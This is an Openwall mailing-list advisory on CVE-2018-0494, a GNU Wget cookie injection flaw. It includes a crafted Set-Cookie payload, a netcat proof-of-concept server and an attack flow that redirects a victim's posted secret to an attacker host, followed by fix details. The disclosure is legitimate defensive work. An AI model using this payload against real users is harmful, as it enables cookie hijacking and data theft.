Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 6 May 2018 23:53:53 +0300 (EEST)
From: Harry Sintonen <>
Subject: GNU Wget Cookie Injection [CVE-2018-0494]

GNU Wget Cookie Injection [CVE-2018-0494]
The latest version of this advisory is available at:


GNU Wget is susceptible to a malicious web server injecting arbitrary cookies to
the cookie jar file.


Normally a website should not be able to set cookies for other domains. Due to
insufficient input validation GNU Wget can be tricked into storing arbitrary cookie
values to the cookie jar file, bypassing this security restriction.


An external attacker is able to inject arbitrary cookie values cookie jar file,
adding new or replacing existing cookie values.


The discovered vulnerability, described in more detail below, enables the attack
described here in brief.

1. The attacker controlled web site sends a specially crafted Set-Cookie -header
    to inject a new authentication cookie for, replacing the existing
    one. In order to be successful the victim must perform a wget operation on the
    attacker controller site, for example:
    wget --load-cookies jar.txt --save-cookies jar.txt https://evil.invalid
2. Victim uses wget to post some secret the the
    wget --load-cookies jar.txt --post-file secret.txt

Since the attacker was able to replace the authentication cookie for,
the secret.txt data will be posted to attacker's account instead to that of the


1. CWE-20: Improper Input Validation in Set-Cookie parsing [CVE-2018-0494]

The cookie parsing implementation does too lax input validation when parsing the
Set-Cookie response from the server. Consider the following malicious response:

HTTP/1.1 200 OK
Content-Length: 0
Set-Cookie: foo="bar	TRUE	/	FALSE	1900000000	injected	cookie
 	";expires=Thursday, 01-Jan-2032 08:00:00 GMT

When parsed by Wget and stored to a cookie jar file it will appear as:

# HTTP cookie file.
# Generated by Wget on 2018-04-27 23:28:21.
# Edit at your own risk.	FALSE	/	FALSE	1956556800	foo	"bar	TRUE	/	FALSE	1900000000	injected	cookie

Since the Wget cookie jar parser skips any leading spaces, the line
will be picked up.

Note: The order in which the hosts/domains are stored in the cookie jar is derived
from the hashing function used to speed up the lookups. If an existing cookie is
to be replaced the server hostname used to serve the Set-Cookie will need to be
carefully chosen to result in hash entry below the targeted domain. If not done,
the original cookie will be used instead of the injected one.

Proof of Concept

1. Set up a minimal web server, good for 1 request:
  $ echo -ne 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nSet-Cookie: foo="bar\r\n\\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie\r\n\t";expires=Thursday, 01-Jan-2032 08:00:00 GMT\r\n\r\n' | nc -v -l 7777

2. Fetch the evil url:
  $ wget --save-cookies jar.txt

3. Examine the resulting cookie jar file:
  $ cat jar.txt

Vulnerable versions

The following GNU Wget versions are confirmed vulnerable:

- 1.7 thru 1.19.4


1. Upgrade to GNU Wget 1.19.5 or later, or to appropriate security updated package
    in your distribution


The vulnerability was discovered by Harry Sintonen / F-Secure Corporation.


2018.04.26  discovered & reported the vulnerability
2018.04.27  CVE-2018-0494 assigned
2018.05.06  GNU Wget 1.19.5 released with the fix
2018.05.06  public disclosure of the advisory

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.